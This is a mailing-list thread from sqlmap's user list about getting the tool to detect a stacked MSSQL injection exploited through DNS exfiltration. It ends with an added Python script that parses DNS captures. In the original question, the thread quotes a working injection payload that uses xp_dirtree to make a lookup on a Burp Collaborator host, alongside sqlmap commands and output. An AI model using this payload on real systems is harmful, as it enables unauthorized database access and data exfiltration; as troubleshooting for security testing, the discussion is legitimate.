I would say the tool doesn't need to be improved for your case. Please
inspect what is going on by manually injecting the testing payloads coming from
sqlmap (use for example -v 3).
I am pretty sure that something is wrong with your setup or the other end
is blocking some of the requests.
Bye
On Tue, Dec 20, 2016 at 12:10 AM, Mark M. <vv...@hotmail.com> wrote:
> Right, that makes sense. But at the same time, this is a valid injection
> (I can reproduce it manually). Perhaps there's information I can provide
> to someone that would help improve the tool so it would catch this
> particular case and others like it?
>
>
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <miroslav.stam...@gmail.com>
> wrote:
>
> As said, there should be at least one other SQLi technique available. In
> your case there is NONE. sqlmap will not blindly use dns-exfil if at least
> one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@hotmail.com> wrote:
>
>> Thanks, that's good advice. And I probably should post a little more
>> detail on what I'm running here so others can see it as well.
>>
>>
>> Here's the command executing:
>>
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
>> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
>> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
>> "Windows" --threads 1
>> ___
>> __H__
>> ___ ___[.]_____ ___ ___ {1.0.12#stable}
>> |_ -| . [)] | .'| . |
>> |___|_ [']_|_|_|__,| _|
>> |_|V |_| http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option
>> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
>> [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
>> comparison on a sequence matcher. If no dynamic nor injectable parameters
>> are detected, or in case of junk results, refer to user's manual paragraph
>> 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
>> 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter
>> 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
>> (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical
>> model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
>> (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
>> injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
>> Try to increase '--level'/'--risk' values to perform more tests. Also, you
>> can try to rerun by providing either a valid value for option '--string'
>> (or '--regexp'). If you suspect that there is some kind of protection
>> mechanism involved (e.g. WAF) maybe you could retry with an option
>> '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>>
>>
>> And then, my capture results for DNS traffic:
>>
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
>> www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
>> www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
>> www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
>> www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
>> www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
>> www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
>> 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>>
>> It doesn't seem like an injection pattern is being tried that is getting
>> the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>>
>> Thanks,
>>
>> V
>>
>> ------------------------------
>> *From:* Miroslav Stampar <miroslav.stam...@gmail.com>
>> *Sent:* Monday, December 19, 2016 4:10 PM
>> *To:* Mark M.
>> *Cc:* sqlmap-users@lists.sourceforge.net
>> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you run Wireshark or similar when running with
>> --dns-domain to properly debug what is going on. There could really be lots
>> of problems before you fine-tune it (e.g. another service running on :53).
>>
>> About "forcing" sqlmap to use dns-exfil: it will always at least
>> try to test it at the start of a run (if another injection technique is
>> available). Also, it will prefer other "faster" techniques (ERROR and
>> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
>> which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give you is to run Wireshark during
>> the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@hotmail.com> wrote:
>>
>>> I have a situation where Burp has detected the following DNS
>>> exfiltration injection for a query parameter in a web app:
>>>
>>>
>>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20v
>>> archar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9
>>> fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.db
>>> o.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>>
>>>
>>> To make that a little easier to read, the injected value is:
>>>
>>>
>>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>>> @q;--
>>>
>>>
>>> I've modified the domain and verified that I receive the DNS requests on
>>> my local DNS server (the domain which I provide to sqlmap using the
>>> --dns-domain=xxx option) when the injection is manually sent to the page.
>>> The problem is, when I pass the request to sqlmap it's not detecting that
>>> there's an injection at all. I've provided the OS/DBMS and --level 5, but
>>> still no dice. I'm using sqlmap v1.0.12#stable.
>>>
>>>
>>> Since I've gotten many other injections to work in the past, I believe
>>> that I'm using sqlmap properly (formatting my request in a file
>>> appropriately, specifying the correct parameter to test, etc.) However, it
>>> surprised me that what appeared to be a fairly straightforward stacked SQL
>>> injection would slip by all of sqlmap's tests. Is there a way to force
>>> sqlmap to try DNS exfiltration injections despite no other injection
>>> technique succeeding?
>>>
>>>
>>> Thanks
>>>
>>> V
>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------
>>> ------------------
>>> Developer Access Program for Intel Xeon Phi Processors
>>> Access to Intel Xeon Phi processor-based developer platforms.
>>> With one year of Intel Parallel Studio XE.
>>> Training and support from Colfax.
>>> Order your platform today.http://sdm.link/intel
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
--
Miroslav Stampar
http://about.me/stamparm
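To make the capture check recommended in this thread repeatable, here is an added Python example (not sqlmap's code and not from any poster) that parses the query lines tcpdump prints for udp port 53, reports whether any lookup falls under the monitored --dns-domain, and flags unusually long labels of the kind a DNS-exfil payload produces. The capture lines, the domain dns.example.com and the 36-character label are constructed; in the thread's real capture every query was for the target site itself, which this script would report as zero hits.

```python
import re
from collections import Counter

# Constructed sample in the format "tcpdump -n udp port 53" prints. The first
# three lines mimic the ordinary lookups seen in the thread; the last is a
# made-up query under the monitored domain (dns.example.com is a placeholder).
SAMPLE_CAPTURE = """\
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:57:02.118400 IP 203.0.113.7.51122 > 97.87.91.210.53: 4411+ A? a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8.dns.example.com. (74)
"""

# Matches query lines only ("<id>+ <TYPE>? <name>."); response lines carry
# "<id> a/b/c" instead and are deliberately ignored.
QUERY_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\S+) > (?P<dst>\S+): \d+\+? "
    r"(?P<qtype>[A-Z]+)\? (?P<qname>\S+?)\. \(\d+\)$"
)


def parse_queries(capture):
    """Return (qtype, qname) tuples for every DNS query line in the capture."""
    queries = []
    for line in capture.splitlines():
        m = QUERY_RE.match(line.strip())
        if m:
            queries.append((m.group("qtype"), m.group("qname").lower()))
    return queries


def queries_under(queries, domain):
    """Queries whose name is the monitored domain or a subdomain of it."""
    d = domain.lower().rstrip(".")
    return [q for q in queries if q[1] == d or q[1].endswith("." + d)]


def longest_label(qname):
    """Length of the longest dot-separated label; exfil names pack data here."""
    return max(len(label) for label in qname.split("."))


def analyse(capture, domain, label_threshold=30):
    """Summarise a capture: total queries, hits under the monitored domain,
    queries with a suspiciously long label, and per-name counts."""
    queries = parse_queries(capture)
    return {
        "queries": len(queries),
        "under_domain": len(queries_under(queries, domain)),
        "long_label": sum(1 for q in queries if longest_label(q[1]) >= label_threshold),
        "names": Counter(q[1] for q in queries),
    }
```

Feed it the text of a real capture (e.g. `analyse(open("dns.txt").read(), "dns.lanternsec.com")`) and a zero in `under_domain` confirms that no payload ever reached the DBMS, which is the situation the tcpdump output above shows.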